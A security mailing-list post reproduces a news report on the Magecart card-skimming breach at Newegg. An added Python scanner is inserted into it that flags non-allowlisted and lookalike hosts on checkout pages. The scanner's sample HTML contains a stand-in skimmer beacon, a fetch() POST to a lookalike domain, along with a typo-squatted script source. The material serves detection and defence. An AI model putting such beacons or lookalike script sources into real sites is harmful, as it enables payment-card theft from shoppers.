[BreachExchange] Hackers stole customer credit cards in Newegg data breach

Destry Winant destry at riskbasedsecurity.com
Thu Sep 20 00:28:56 EDT 2018


https://techcrunch.com/2018/09/19/newegg-credit-card-data-breach/

Newegg is clearing up its website after a month-long data breach.

Hackers injected 15 lines of card skimming code on the online
retailer’s payments page which remained for more than a month between
August 14 and September 18, Yonathan Klijnsma, a threat researcher at
RiskIQ, told TechCrunch. The code siphoned off credit card data from
unsuspecting customers to a server controlled by the hackers with a
similar domain name — likely to avoid detection. The server even used
an HTTPS certificate to blend in.
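The paragraph above describes the defender's problem in one line: a few lines of script on the checkout page quietly posting form data to a host that looks like the retailer's own. The scanner below is an added example, not code from the TechCrunch article, RiskIQ, Volexity or Newegg. It parses a checkout page's HTML, collects every place the page references another host (script sources, form actions, iframe and image sources, and absolute URLs inside inline scripts), and flags any host that is not on an allowlist, marking it as a lookalike when it is within a small edit distance of the brand domain or embeds the brand name. The domain names, allowlist and sample HTML are all constructed for illustration, and the `registrable()` helper is a deliberately crude assumption (it takes the last two labels rather than consulting a public-suffix list).

```python
"""Audit a checkout page for references to non-allowlisted or lookalike hosts.

Added example for illustration; the hosts and HTML below are constructed and
do not correspond to any real site or to the Newegg incident's infrastructure.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Absolute URLs embedded in inline script bodies (e.g. a fetch() target).
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def edit_distance(a, b):
    """Levenshtein distance, used to spot typo-squat style lookalike domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


class _RefCollector(HTMLParser):
    """Collect every place the page hands control or data to another host."""

    def __init__(self):
        super().__init__()
        self.refs = []          # list of (kind, url)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.refs.append(("script-src", a["src"]))
        elif tag == "form" and a.get("action"):
            self.refs.append(("form-action", a["action"]))
        elif tag in ("iframe", "img") and a.get("src"):
            self.refs.append((tag + "-src", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script bodies arrive as one chunk; pull out absolute URLs.
        if self._in_script:
            for url in URL_RE.findall(data):
                self.refs.append(("inline-script-url", url))


def registrable(host):
    """Crude 'domain.tld' of a host (assumption: no public-suffix list used)."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def audit_page(html, allowed_hosts, brand_domain, max_distance=2):
    """Return findings for hosts the page references that are not allowlisted.

    Each finding is {"kind", "host", "reason"}; reason says "lookalike of ..."
    when the host's registrable domain is within max_distance edits of the
    brand domain or embeds the brand's first label (e.g. "brand-stats.test").
    """
    collector = _RefCollector()
    collector.feed(html)
    brand_reg = registrable(brand_domain)
    brand_label = brand_reg.split(".")[0]
    findings = []
    for kind, url in collector.refs:
        host = urlparse(url).hostname
        if not host:            # relative URL: same origin, nothing to flag
            continue
        host = host.lower()
        if host in allowed_hosts:
            continue
        reg = registrable(host)
        if reg != brand_reg and (edit_distance(reg, brand_reg) <= max_distance
                                 or brand_label in reg):
            reason = "lookalike of " + brand_reg
        else:
            reason = "not allowlisted"
        findings.append({"kind": kind, "host": host, "reason": reason})
    return findings


# Constructed sample: a checkout page with one legitimate CDN script, one
# typo-squat script source, and an inline beacon to a brand-named foreign host.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="pay" action="/api/pay" method="post"><input name="card"></form>
<script src="https://cdn.example-store.test/checkout.js"></script>
<script src="https://examp1e-store.test/js/c.js"></script>
<script>
  // constructed stand-in for an injected beacon; carries no real logic
  fetch("https://example-store-stats.test/collect", {method: "POST"});
</script>
</body></html>
"""
ALLOWED_HOSTS = {"cdn.example-store.test", "checkout.example-store.test"}

if __name__ == "__main__":
    for f in audit_page(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS, "example-store.test"):
        print(f"{f['kind']:18} {f['host']:28} {f['reason']}")
```

Run against a fetched copy of the real checkout page on a schedule and diff the findings against the previous run; a new host appearing in any of these positions is exactly the signal a month-long skimmer dwell time would have produced, and a Content-Security-Policy with a tight `connect-src` and `script-src` is the complementary control that stops the beacon even if the injection is missed.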

The code also worked for both desktop and mobile customers — though
it’s unclear if mobile customers are affected.

The online electronics retailer removed the code on Tuesday after it
was contacted by incident response firm Volexity, which first
discovered the card skimming malware and reported its findings.

Newegg is one of the largest retailers in the US, making $2.65 billion
in revenue in 2016. The company touts more than 45 million monthly
unique visitors, but it’s not known precisely how many customers
completed transactions during the period.

In an email to customers, Newegg chief executive Danny Lee said the
company has “not yet determined which customer accounts may have been
affected.” When reached, a Newegg spokesperson did not immediately
comment.

Klijnsma called the incident “another well-disguised attack” that
looked near-identical to the recent British Airways credit card
breach, and earlier, the Ticketmaster breach. Like that breach, RiskIQ
attributed the Newegg credit card theft to the Magecart group, a
collective of hackers that carry out targeted attacks against
vulnerable websites.

The code used in both skimming attacks was near identical, according
to the research.

“The breach of Newegg shows the true extent of Magecart operators’
reach,” said Klijnsma. “These attacks are not confined to certain
geolocations or specific industries—any organization that processes
payments online is a target.”

Like previous card skimming campaigns, he said that the hackers
“integrated with the victim’s payment system and blended with the
infrastructure and stayed there as long as possible.”

Anyone who entered their credit card data during the period should
immediately contact their banks.
